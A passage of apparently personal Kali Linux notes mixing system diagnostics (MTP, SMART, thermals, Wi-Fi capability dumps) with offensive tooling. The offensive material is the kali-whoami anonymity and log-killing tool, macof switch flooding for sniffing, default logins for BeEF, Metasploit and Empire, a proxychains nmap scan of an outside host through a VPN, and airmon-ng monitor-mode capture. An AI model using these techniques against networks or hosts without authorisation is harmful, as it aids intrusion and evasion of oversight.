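    }


def transfer_and_verify(content):
    """Run the whole exchange on one host and return the comparison of both files."""
    with tempfile.TemporaryDirectory() as d:
        src = os.path.join(d, "Stuff.To.Process.txt")
        dst = os.path.join(d, "dup.Stuff.To.Process.txt")
        with open(src, "wb") as f:
            f.write(content)
        ready = {"event": threading.Event()}
        server = threading.Thread(target=serve_file_once, args=(src, ready))
        server.start()
        ready["event"].wait()            # wait until the listener has a port
        fetch_file(ready["port"], dst)
        server.join()
        return verify_copy(src, dst)


def verify_pair(a, b):
    """Compare two byte strings as files, to show why size alone is not enough."""
    with tempfile.TemporaryDirectory() as d:
        pa, pb = os.path.join(d, "a"), os.path.join(d, "b")
        for p, data in ((pa, a), (pb, b)):
            with open(p, "wb") as f:
                f.write(data)
        return verify_copy(pa, pb)


if __name__ == "__main__":
    # Constructed sample content; a real run would read the file named above.
    print(transfer_and_verify(b"constructed sample file\n" * 5000))
    print(verify_pair(b"same length", b"same lengtH"))
```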
Kali Undercover is a set of scripts that changes the look and feel of your Kali Linux desktop environment to Windows 10 desktop environment, like magic.
The main purpose of introducing Kali Undercover mode is to prevent any unnecessary attention while using Kali Linux in public.
Run 'kali-undercover' to start the process and then again to terminate it.
Ref (https://www.kali.org/docs/introduction/kali-undercover/)
So, what does kali-whoami use?
Anti MITM
Log killer
IP changer
Dns Changer
Mac changer
Anti cold boot
Timezone changer
Hostname changer
Browser anonymization
Download from https://github.com/omer-dogan/kali-whoami. Unzip the download into its own directory and cd into it. There run this command;
sudo make install
Now check that the program has been compiled and installed.
$ which kali-whoami
/usr/bin/kali-whoami
$
Also install these
sudo apt update && sudo apt install tar tor curl python3 python3-scapy network-manager
Syntax: sudo bash whoami --start (or bash whoami --start but this is not recommended)
This command restores all settings from the previously backed up system configuration and turns whoami off completely:
sudo bash whoami --stop (or bash whoami --stop but this is not recommended)
This command shows the whoami status and detailed ip address
sudo bash whoami --status (or bash whoami --status but this is not recommended)
Ref (https://www.errorsfind.com/anonymous-on-kali-linux-at-the-highest-level/20/09/)
This will identify the WiFi AP you are associated with.
$ iwgetid wlan0
ESSID:"ATTFJ4Br3A"
macof floods the local network with random MAC addresses (causing some switches to fail open in repeating mode, facilitating sniffing). A straight C port of the original Perl Net::RawIP macof program by Ian Vitek.
Kali changed to a non-root user policy by default since the release of 2020.1.
This means:
Default Tool Credentials
Some tools shipped with Kali will use their own default hardcoded credentials (others will generate a new password the first time they are used). The following tools have the default values:
BeEF-XSS
  Username: beef
  Password: beef
  Configuration File: /etc/beef-xss/config.yaml
MySQL
  User: root
  Password: (blank)
  Setup Program: mysql_secure_installation
OpenVAS
  Username: admin
  Password:
  Setup Program: openvas-setup
Metasploit-Framework
  Username: postgres
  Password: postgres
  Configuration File: /usr/share/metasploit-framework/config/database.yml
PowerShell-Empire/Starkiller
  Username: empireadmin
  Password: password123
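Knowing the defaults is only useful if you check that they are gone before a box goes on a shared network. The following is an added example (my own code, not Kali's or any of these tools'): it pulls user- and password-like key/value lines out of a YAML- or INI-style config and compares them with the defaults listed above. The config samples are constructed and merely shaped like the real files; the key names the regex accepts (user, username, passwd, password) are an assumption.

```python
# Added example, not part of the original notes.
import re

# (default username, default password) per tool, as listed in the notes above.
KNOWN_DEFAULTS = {
    "beef-xss": ("beef", "beef"),
    "mysql": ("root", ""),
    "metasploit-framework": ("postgres", "postgres"),
    "powershell-empire": ("empireadmin", "password123"),
}

# Matches lines such as `user: "beef"`, `username: postgres`, `password = secret`.
# Assumed key names; extend the alternation if a tool uses different ones.
CRED_LINE = re.compile(
    r"""^\s*(?P<key>user(?:name)?|passw(?:or)?d)\s*[:=]\s*["']?(?P<val>[^"'\s]*)["']?\s*$""",
    re.IGNORECASE,
)


def extract_credentials(config_text):
    """Collect every user-like and password-like value from a YAML/INI-style file."""
    users, passwords = set(), set()
    for line in config_text.splitlines():
        m = CRED_LINE.match(line)
        if not m:
            continue
        bucket = passwords if m.group("key").lower().startswith("pass") else users
        bucket.add(m.group("val"))
    return users, passwords


def check_default_credentials(tool, config_text):
    """Return findings for `tool` (a KNOWN_DEFAULTS key); an empty list means no default found."""
    default_user, default_password = KNOWN_DEFAULTS[tool]
    users, passwords = extract_credentials(config_text)
    findings = []
    if default_user in users and default_password in passwords:
        findings.append(
            f"{tool}: default credentials {default_user!r}/{default_password!r} still configured"
        )
    elif default_password in passwords:
        findings.append(f"{tool}: default password {default_password!r} still configured")
    return findings


# Constructed samples: the BeEF one keeps the shipped defaults, the Metasploit one was changed.
BEEF_SAMPLE = """\
beef:
    credentials:
        user: "beef"
        passwd: "beef"
"""
MSF_SAMPLE = """\
production:
  adapter: postgresql
  database: msf
  username: msf
  password: "kX9-not-the-default"
"""

if __name__ == "__main__":
    for tool, cfg in (("beef-xss", BEEF_SAMPLE), ("metasploit-framework", MSF_SAMPLE)):
        print(tool, check_default_credentials(tool, cfg) or "OK")
```

Point it at the real configuration files listed above (read with `open(path).read()`) to audit an installed system.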
This software can be installed on Linux and then used at the command line to mount and access an Android file system, for file copy or just about anything.
I need to look further if I want to mount/access Android like any disk partition.
$ sudo apt install gmtp
$ sudo apt install mtp-tools
$ mtp-connect
$ mtp-folders
$ mtp-detect
libmtp version: 1.1.18

Listing raw device(s)
Device 0 (VID=04e8 and PID=6860) is a Samsung Galaxy models (MTP).
   Found 1 device(s):
   Samsung: Galaxy models (MTP) (04e8:6860) @ bus 3, dev 12
Attempting to connect device(s)
libusb_claim_interface() reports device is busy, likely in use by GVFS or KDE MTP device handling already
LIBMTP PANIC: Unable to initialize device
Unable to open raw device 0
OK.
$ mtp-folders
Completing external command
mtp-albumart     mtp-emptyfolders  mtp-getfile      mtp-playlists  mtp-tracks
mtp-albums       mtp-files         mtp-getplaylist  mtp-reset      mtp-trexist
mtp-connect      mtp-filetree      mtp-hotplug      mtp-sendfile
mtp-delfile      mtp-folders       mtp-newfolder    mtp-sendtr
mtp-detect       mtp-format        mtp-newplaylist  mtp-thumb
I need to review this page and see if I can do this... https://askubuntu.com/questions/474669/ssd-temperature-sensor-readout-with-hddtemp

$ sudo smartctl /dev/nvme0n1 -a | grep -i Temp
Warning  Comp. Temp. Threshold:     83 Celsius
Critical Comp. Temp. Threshold:     85 Celsius
Temperature:                        56 Celsius
Warning  Comp. Temperature Time:    0
Critical Comp. Temperature Time:    0
Temperature Sensor 1:               56 Celsius
Temperature Sensor 2:               60 Celsius

$ sudo smartctl -a /dev/nvme0n1
smartctl 7.2 2020-12-30 r5155 [x86_64-linux-5.10.0-kali9-amd64] (local build)
Copyright (C) 2002-20, Bruce Allen, Christian Franke, www.smartmontools.org

=== START OF INFORMATION SECTION ===
Model Number:                       BC511 NVMe SK hynix 512GB
Serial Number:                      NY12N067711602M15
Firmware Version:                   11004101
PCI Vendor/Subsystem ID:            0x1c5c
IEEE OUI Identifier:                0xace42e
Controller ID:                      1
NVMe Version:                       1.3
Number of Namespaces:               1
Namespace 1 Size/Capacity:          512,110,190,592 [512 GB]
Namespace 1 Formatted LBA Size:     512
Local Time is:                      Sun Jul 18 12:24:43 2021 EDT
Firmware Updates (0x16):            3 Slots, no Reset required
Optional Admin Commands (0x0017):   Security Format Frmw_DL Self_Test
Optional NVM Commands (0x0057):     Comp Wr_Unc DS_Mngmt Sav/Sel_Feat Timestmp
Log Page Attributes (0x02):         Cmd_Eff_Lg
Maximum Data Transfer Size:         64 Pages
Warning  Comp. Temp. Threshold:     83 Celsius
Critical Comp. Temp. Threshold:     85 Celsius
Namespace 1 Features (0x02):        NA_Fields

Supported Power States
St Op     Max   Active     Idle   RL RT WL WT  Ent_Lat  Ex_Lat
 0 +     3.5000W       -        -    0  0  0  0        5       5
 1 +     2.4000W       -        -    1  1  1  1       30      30
 2 +     1.9000W       -        -    2  2  2  2      100     100
 3 -     0.0350W       -        -    3  3  3  3     1000    1000
 4 -     0.0050W       -        -    3  3  3  3     5000    5000

Supported LBA Sizes (NSID 0x1)
Id Fmt  Data  Metadt  Rel_Perf
 0 +     512       0         0
 1 -    4096       0         0

=== START OF SMART DATA SECTION ===
SMART overall-health self-assessment test result: PASSED

SMART/Health Information (NVMe Log 0x02)
Critical Warning:                   0x00
Temperature:                        55 Celsius
Available Spare:                    100%
Available Spare Threshold:          50%
Percentage Used:                    0%
Data Units Read:                    1,827,016 [935 GB]
Data Units Written:                 2,814,285 [1.44 TB]
Host Read Commands:                 9,840,369
Host Write Commands:                15,067,596
Controller Busy Time:               76
Power Cycles:                       129
Power On Hours:                     18
Unsafe Shutdowns:                   26
Media and Data Integrity Errors:    0
Error Information Log Entries:      0
Warning  Comp. Temperature Time:    0
Critical Comp. Temperature Time:    0
Temperature Sensor 1:               55 Celsius
Temperature Sensor 2:               60 Celsius

Error Information (NVMe Log 0x01, 16 of 256 entries)
No Errors Logged

https://www.dell.com/community/Inspiron/Inspiron-G5-15-5587-thermals-cooling-fan-control/td-p/6213519/page/2

Dell G5 15 5587 Overheating Issue

Hello everyone. I recently purchased a Dell G5 5587 laptop and am experiencing overheating issues. I had a bit of surfing on the net (Reddit, Dell Community Forums, Google+) and found out that many people are experiencing the same issue. I found a solution to lower the temperatures by undervolting the CPU via Throttlestop and it actually helps. But I still get occasional FPS drops (every 10-15 minutes). It's like a minifreeze followed by a sound crack and it only goes for maybe half a second and everything goes back to normal. Anyone else experiencing the same thing? Are there any other suggestions to eliminate this problem? I turned off the turboboost and the issue has been resolved. However it affects the performance drastically. (Far Cry 5 in-game benchmark result: with turboboost average fps 76, without turboboost average fps 55.) So deactivating the turboboost defies the purpose of having a gaming laptop. I am currently using a platform to elevate the computer and it does help with reducing the core temp, however this minifreeze issue is still occurring. Also with the new BIOS update (1.9) Dell Power Manager has a new Thermal Management feature and I already set it for Ultra Performance. So I am not sure what to do. Thank you in advance.

In Thermal Management try setting it to Optimize. When my G5 5587 is set to Optimize with no games running, it stays between 50-55 C. I have not tried any CPU intensive games yet.

https://github.com/FlyGoat/RyzenAdj

echo $(($(cat /sys/class/thermal/thermal_zone0/temp) / 1000))
echo $(($(cat /sys/class/thermal/thermal_zone1/temp) / 1000))

https://www.pcgamer.com/amd-views-ryzen-5000-cpu-temperatures-up-to-95c-as-typical-and-by-design/

Shell script to control fans
https://www.reddit.com/r/Dell/comments/gzens4/dell_g5_15_se_2020_model_5505_controlling_the/
Capabilities (0x78031220abc0): +HTC HE Supported TWT Requester Trigger Frame MAC Padding Duration: 2 Multi-TID Aggregation Support: 7 32-bit BA Bitmap OM Control Maximum A-MPDU Length Exponent: 2 A-MSDU in A-MPDU Multi-TID Aggregation TX: 7 UL 2x996-Tone RU HE PHY Capabilities: (0x0e3f0200fd09800ecff200): HE40/2.4GHz HE40/HE80/5GHz HE160/5GHz Punctured Preamble RX: 15 Device Class: 1 LDPC Coding in Payload NDP with 4x HE-LTF and 3.2us GI SU Beamformee Beamformee STS <= 80Mhz: 7 Beamformee STS > 80Mhz: 7 Sounding Dimensions <= 80Mhz: 1 Sounding Dimensions > 80Mhz: 1 PPE Threshold Present Power Boost Factor ar HE SU PPDU & HE PPDU 4x HE-LTF 0.8us GI Max NC: 1 HE ER SU PPDU 4x HE-LTF 0.8us GI 20MHz in 40MHz HE PPDU 2.4GHz 20MHz in 160/80+80MHz HE PPDU 80MHz in 160/80+80MHz HE PPDU DCM Max BW: 3 Non-Triggered CQI Feedback RX Full BW SU Using HE MU PPDU with Compression SIGB RX Full BW SU Using HE MU PPDU with Non-Compression SIGB HE RX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE RX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported PPE Threshold 0x61 0x1c 0xc7 0x71 HE Iftypes: AP HE MAC Capabilities (0x780112080840): +HTC HE Supported Trigger Frame MAC Padding Duration: 2 Multi-TID Aggregation Support: 7 
BSR OM Control Maximum A-MPDU Length Exponent: 2 A-MSDU in A-MPDU UL 2x996-Tone RU HE PHY Capabilities: (0x0e200200fd09800ccff000): HE40/2.4GHz HE40/HE80/5GHz HE160/5GHz LDPC Coding in Payload NDP with 4x HE-LTF and 3.2us GI SU Beamformee Beamformee STS <= 80Mhz: 7 Beamformee STS > 80Mhz: 7 Sounding Dimensions <= 80Mhz: 1 Sounding Dimensions > 80Mhz: 1 PPE Threshold Present HE SU PPDU & HE PPDU 4x HE-LTF 0.8us GI Max NC: 1 HE ER SU PPDU 4x HE-LTF 0.8us GI 20MHz in 40MHz HE PPDU 2.4GHz 20MHz in 160/80+80MHz HE PPDU 80MHz in 160/80+80MHz HE PPDU DCM Max BW: 3 RX Full BW SU Using HE MU PPDU with Compression SIGB RX Full BW SU Using HE MU PPDU with Non-Compression SIGB HE RX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set <= 80 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE RX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported HE TX MCS and NSS set 160 MHz 1 streams: MCS 0-11 2 streams: MCS 0-11 3 streams: not supported 4 streams: not supported 5 streams: not supported 6 streams: not supported 7 streams: not supported 8 streams: not supported PPE Threshold 0x61 0x1c 0xc7 0x71 Bitrates (non-HT): * 6.0 Mbps * 9.0 Mbps * 12.0 Mbps * 18.0 Mbps * 24.0 Mbps * 36.0 Mbps * 48.0 Mbps * 54.0 Mbps Frequencies: * 5180 MHz [36] (22.0 dBm) * 5200 MHz [40] (22.0 dBm) * 5220 MHz [44] (22.0 dBm) * 5240 MHz [48] (22.0 dBm) * 5260 MHz [52] (22.0 dBm) (no IR, radar detection) * 5280 MHz [56] (22.0 dBm) (no IR, radar detection) * 5300 MHz [60] (22.0 dBm) (no IR, radar detection) * 5320 MHz [64] 
(22.0 dBm) (no IR, radar detection) * 5340 MHz [68] (disabled) * 5360 MHz [72] (disabled) * 5380 MHz [76] (disabled) * 5400 MHz [80] (disabled) * 5420 MHz [84] (disabled) * 5440 MHz [88] (disabled) * 5460 MHz [92] (disabled) * 5480 MHz [96] (disabled) * 5500 MHz [100] (22.0 dBm) (no IR, radar detection) * 5520 MHz [104] (22.0 dBm) (no IR, radar detection) * 5540 MHz [108] (22.0 dBm) (no IR, radar detection) * 5560 MHz [112] (22.0 dBm) (no IR, radar detection) * 5580 MHz [116] (22.0 dBm) (no IR, radar detection) * 5600 MHz [120] (22.0 dBm) (no IR, radar detection) * 5620 MHz [124] (22.0 dBm) (no IR, radar detection) * 5640 MHz [128] (22.0 dBm) (no IR, radar detection) * 5660 MHz [132] (22.0 dBm) (no IR, radar detection) * 5680 MHz [136] (22.0 dBm) (no IR, radar detection) * 5700 MHz [140] (22.0 dBm) (no IR, radar detection) * 5720 MHz [144] (22.0 dBm) (no IR, radar detection) * 5745 MHz [149] (22.0 dBm) * 5765 MHz [153] (22.0 dBm) * 5785 MHz [157] (22.0 dBm) * 5805 MHz [161] (22.0 dBm) * 5825 MHz [165] (22.0 dBm) * 5845 MHz [169] (disabled) * 5865 MHz [173] (disabled) * 5885 MHz [177] (disabled) * 5905 MHz [181] (disabled) Supported commands: * new_interface * set_interface * new_key * start_ap * new_station * new_mpath * set_mesh_config * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * join_mesh * remain_on_channel * set_tx_bitrate_mask * frame * frame_wait_cancel * set_wiphy_netns * set_channel * set_wds_peer * tdls_mgmt * tdls_oper * start_sched_scan * probe_client * set_noack_map * register_beacons * start_p2p_device * set_mcast_rate * connect * disconnect * channel_switch * set_qos_map * add_tx_ts * set_multicast_to_unicast WoWLAN support: * wake up on disconnect * wake up on magic packet * wake up on pattern match, up to 20 patterns of 16-128 bytes, maximum packet offset 0 bytes * can do GTK rekeying * wake up on GTK rekey failure * wake up on EAP identity request * wake up on 4-way handshake * wake up on rfkill release * wake 
up on network detection, up to 8 match sets software interface modes (can always be added): * AP/VLAN * monitor valid interface combinations: * #{ managed } <= 1, #{ AP, P2P-client, P2P-GO } <= 1, #{ P2P-device } <= 1, total <= 3, #channels <= 2 HT Capability overrides: * MCS: ff ff ff ff ff ff ff ff ff ff * maximum A-MSDU length * supported channel width * short GI for 40 MHz * max A-MPDU length exponent * min MPDU start spacing Device supports TX status socket option. Device supports HT-IBSS. Device supports SAE with AUTHENTICATE command Device supports low priority scan. Device supports scan flush. Device supports per-vif TX power setting P2P GO supports CT window setting P2P GO supports opportunistic powersave setting Driver supports full state transitions for AP/GO clients Driver supports a userspace MPM Driver/device bandwidth changes during BSS lifetime (AP/GO mode) Device adds DS IE to probe requests Device can update TPC Report IE Device supports static SMPS Device supports dynamic SMPS Device supports WMM-AC admission (TSPECs) Device supports configuring vdev MAC-addr on create. Device supports randomizing MAC-addr in scans. Device supports randomizing MAC-addr in sched scans. Device supports randomizing MAC-addr in net-detect scans. 
	max # scan plans: 2
	max scan plan interval: 65535
	max scan plan iterations: 254
	Supported TX frame types:
		 * IBSS: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * managed: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * AP: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * AP/VLAN: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * mesh point: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-client: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-GO: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
		 * P2P-device: 0x00 0x10 0x20 0x30 0x40 0x50 0x60 0x70 0x80 0x90 0xa0 0xb0 0xc0 0xd0 0xe0 0xf0
	Supported RX frame types:
		 * IBSS: 0x40 0xb0 0xc0 0xd0
		 * managed: 0x40 0xb0 0xd0
		 * AP: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * AP/VLAN: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * mesh point: 0xb0 0xc0 0xd0
		 * P2P-client: 0x40 0xd0
		 * P2P-GO: 0x00 0x20 0x40 0xa0 0xb0 0xc0 0xd0
		 * P2P-device: 0x40 0xd0
	Supported extended features:
		* [ VHT_IBSS ]: VHT-IBSS
		* [ RRM ]: RRM
		* [ MU_MIMO_AIR_SNIFFER ]: MU-MIMO sniffer
		* [ SCAN_START_TIME ]: scan start timestamp
		* [ BSS_PARENT_TSF ]: BSS last beacon/probe TSF
		* [ FILS_STA ]: STA FILS (Fast Initial Link Setup)
		* [ CONTROL_PORT_OVER_NL80211 ]: control port over nl80211
		* [ TXQS ]: FQ-CoDel-enabled intermediate TXQs
		* [ ENABLE_FTM_RESPONDER ]: enable FTM (Fine Time Measurement) responder
		* [ CONTROL_PORT_NO_PREAUTH ]: disable pre-auth over nl80211 control port support
		* [ PROTECTED_TWT ]: protected Target Wake Time (TWT) support
		* [ DEL_IBSS_STA ]: deletion of IBSS station support
		* [ SCAN_FREQ_KHZ ]: scan on kHz frequency support
		* [ CONTROL_PORT_OVER_NL80211_TX_STATUS ]: tx status for nl80211 control port support

$ sudo iw wlan0 scan | egrep "^BSS|SSID"
BSS 88:dc:96:47:d0:af(on wlan0) -- associated
	SSID: CCCCPrivate
BSS 88:dc:96:49:b3:8e(on wlan0)
	SSID: CCCC_Tech_Booth
BSS 88:dc:96:49:b3:82(on wlan0)
	SSID: CCCCPrivate
BSS 8a:dc:96:49:b3:82(on wlan0)
	SSID: CCCCPublic
BSS 88:dc:96:47:d0:ae(on wlan0)
	SSID: CCCCPrivate
BSS 8a:dc:96:47:d0:ae(on wlan0)
	SSID: CCCCPublic
BSS 88:dc:96:49:b3:88(on wlan0)
	SSID: CCCCPrivate
BSS 8a:dc:96:49:b3:88(on wlan0)
	SSID: CCCCPublic
BSS e8:9f:80:43:55:05(on wlan0)
	SSID: CCCCPrivate
	 * SSID List
BSS ee:9f:80:43:55:05(on wlan0)
	SSID: 
	 * SSID List
BSS e8:9f:80:43:55:06(on wlan0)
	SSID: CCCCPrivate
	 * SSID List
BSS 68:39:43:98:7a:9f(on wlan0)
	SSID: HLD_1987A9F
BSS 88:dc:96:49:b3:8f(on wlan0)
	SSID: CCCC_Tech_Booth
BSS 88:dc:96:49:b3:83(on wlan0)
	SSID: CCCCPrivate
BSS 8a:dc:96:49:b3:83(on wlan0)
	SSID: CCCCPublic

--------

$ nmcli -f in-use,ssid,chan,bars,security,bssid dev wifi list
IN-USE  SSID             CHAN  BARS  SECURITY   BSSID
        CCCC_Tech_Booth  1     ▂▄▆█  WPA2       88:DC:96:49:B3:8E
        CCCCPrivate      6     ▂▄▆█  WPA2       88:DC:96:49:B3:82
        CCCCPrivate      6     ▂▄▆█  WPA2       88:DC:96:47:D0:AE
        CCCCPublic       6     ▂▄▆█  --         8A:DC:96:49:B3:82
        CCCCPublic       6     ▂▄▆█  --         8A:DC:96:47:D0:AE
        CCCC_Tech_Booth  60    ▂▄▆_  WPA2       88:DC:96:49:B3:8F
        CCCCPrivate      60    ▂▄▆_  WPA2       88:DC:96:49:B3:83
        CCCCPublic       60    ▂▄▆_  --         8A:DC:96:49:B3:83
*       CCCCPrivate      44    ▂▄▆_  WPA2       88:DC:96:47:D0:AF
        HLD_1987A9F      165   ▂▄▆_  WPA1 WPA2  68:39:43:98:7A:9F
        CCCCPrivate      6     ▂▄__  WPA2       E8:9F:80:43:55:05
        --               6     ▂▄__  WPA2       EE:9F:80:43:55:05
        CCCCPrivate      36    ▂___  WPA2       E8:9F:80:43:55:06
        CCCCPrivate      6     ▂___  WPA2       88:DC:96:49:B3:88
        CCCCPublic       6     ▂___  --         8A:DC:96:49:B3:88
        CCCCPrivate      161   ▂___  WPA2       E8:9F:80:43:55:07

$ sudo journalctl --system --no-pager | grep -i "eth0"

Restore a MySQL database from backup:
mysql -u [user] -p [database_name] < [filename].sql

$ sudo rovclock --help
Radeon overclock 0.6e by Hasw (hasw@hasw.net)
Found ATI card on 08:00, device id: 0x1636
I/O base address: 0x1000
Video BIOS signature not found.
Invalid reference clock from BIOS: 0.0 MHz
rovclock: invalid option -- '-'
Usage: rovclock
  -i (info)
  -c [MHz] (set core clock)
  -m [MHz] (set mem clock)
  -x [kHz] (xtal frequency, default 2700)
  -t [name]:[val] (set memory timings)

$ sudo rovclock -i
Radeon overclock 0.6e by Hasw (hasw@hasw.net)
Found ATI card on 08:00, device id: 0x1636
I/O base address: 0x1000
Video BIOS signature not found.
Invalid reference clock from BIOS: 0.0 MHz
Memory size: 0 kB
Memory channels: 0, CD,CH only: 0
tRcdRD: 5 tRcdWR: 1 tRP: 3 tRAS: 6 tRRD: 1 tR2W-CL: 1 tWR: 1 tW2R: 0 tW2Rsb: 0 tR2R: 1 tRFC: 13 tWL(0.5): 1 tCAS: 0 tCMD: 0 tSTR: 0
zsh: floating point exception  sudo rovclock -i

Working on setting up an OpenVPN connection with a random NordVPN proxy using my account, and then running network commands through it. This is just some testing of the process.

$ proxychains sudo nmap -sT -p 80 ont.by
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-21 12:38 EDT
Nmap scan report for ont.by (178.124.138.31)
Host is up (0.043s latency).

PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds

proxychains nc -vv -n ont.by 80
GET / HTTP 1.0

sudo open /etc/openvpn/ovpn_udp/za123.nordvpn.com.udp.ovpn

┌──(parth㉿Parth)-[/etc/openvpn]
$ sudo systemctl stop nordvpnd
$ sudo openvpn /etc/openvpn/ovpn_udp/za123.nordvpn.com.udp.ovpn

┌──(parth㉿Parth)-[/etc/openvpn]
$ nc -vv perl.com 80
Ncat: Version 7.92 ( https://nmap.org/ncat )
NCAT DEBUG: Using system default trusted CA certificates and those in /etc/ssl/certs/ca-certificates.crt.
libnsock nsock_iod_new2(): nsock_iod_new (IOD #1)
libnsock nsock_connect_tcp(): TCP connection requested to 151.101.130.132:80 (IOD #1) EID 8
libnsock nsock_trace_handler_callback(): Callback: CONNECT SUCCESS for EID 8 [151.101.130.132:80]
Ncat: Connected to 151.101.130.132:80.
libnsock nsock_iod_new2(): nsock_iod_new (IOD #2)
libnsock nsock_read(): Read request from IOD #1 [151.101.130.132:80] (timeout: -1ms) EID 18
libnsock nsock_readbytes(): Read request for 0 bytes from IOD #2 [peer unspecified] EID 26
GET / HTTP/1.0
libnsock nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 26 [peer unspecified] (15 bytes): GET / HTTP/1.0.
libnsock nsock_write(): Write request for 15 bytes to IOD #1 EID 35 [151.101.130.132:80]
libnsock nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 35 [151.101.130.132:80]
libnsock nsock_readbytes(): Read request for 0 bytes from IOD #2 [peer unspecified] EID 42
libnsock nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 42 [peer unspecified] (1 bytes): .
libnsock nsock_write(): Write request for 1 bytes to IOD #1 EID 51 [151.101.130.132:80]
libnsock nsock_trace_handler_callback(): Callback: WRITE SUCCESS for EID 51 [151.101.130.132:80]
libnsock nsock_readbytes(): Read request for 0 bytes from IOD #2 [peer unspecified] EID 58
libnsock nsock_trace_handler_callback(): Callback: READ SUCCESS for EID 18 [151.101.130.132:80] (496 bytes)
HTTP/1.1 500 Domain Not Found
Server: Varnish
Retry-After: 0
content-type: text/html
Cache-Control: private, no-cache
X-Served-By: cache-lcy19265-LCY
Content-Length: 221
Accept-Ranges: bytes
Date: Sat, 21 May 2022 16:59:25 GMT
Via: 1.1 varnish
Connection: close

$ sudo airmon-ng check kill
$ sudo airmon-ng start wlan0
$ ifconfig
eth0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        ether c0:25:a5:16:53:2d  txqueuelen 1000  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0
        device interrupt 45  base 0xf000

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 4303  bytes 230791 (225.3 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 4303  bytes 230791 (225.3 KiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

wlan0mon: flags=867<UP,BROADCAST,NOTRAILERS,RUNNING,PROMISC,ALLMULTI>  mtu 1500
        unspec B0-7D-64-E7-BA-A3-00-32-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 9164  bytes 4629039 (4.4 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

$ sudo airmon-ng stop wlan0mon

PHY	Interface	Driver		Chipset

phy0	wlan0mon	iwlwifi		Intel Corporation Wi-Fi 6 AX200 (rev 1a)
		(mac80211 station mode vif enabled on [phy0]wlan0)
		(mac80211 monitor mode vif disabled for [phy0]wlan0mon)

$ sudo ifconfig wlan0 up

List all services named netwo* to identify networking.service (which might be 'exited'):
$ sudo systemctl status netwo*

Now I can check the status 'exited':
$ sudo systemctl status networking.service
● networking.service - Raise network interfaces
     Loaded: loaded (/lib/systemd/system/networking.service; enabled; vendor preset: enabled)
     Active: active (exited) since Sat 2022-05-14 16:13:53 EDT; 1s ago
       Docs: man:interfaces(5)
    Process: 13762 ExecStart=/sbin/ifup -a --read-environment (code=exited, status=0/SUCCESS)
   Main PID: 13762 (code=exited, status=0/SUCCESS)
        CPU: 40ms

May 14 16:13:53 Parth systemd[1]: Starting Raise network interfaces...
May 14 16:13:53 Parth systemd[1]: Finished Raise network interfaces.

$ sudo airmon-ng start wlan0
Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before
putting the card in monitor mode, they will interfere by changing channels

 CH 12 ][ Elapsed: 4 mins ][ 2022-05-14 16:08

 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC  CIPHER  AUTH  ESSID

 C8:52:61:97:05:B0  -39      392      214    0   6  195   WPA2 CCMP    PSK   ATTFJ4Br3A
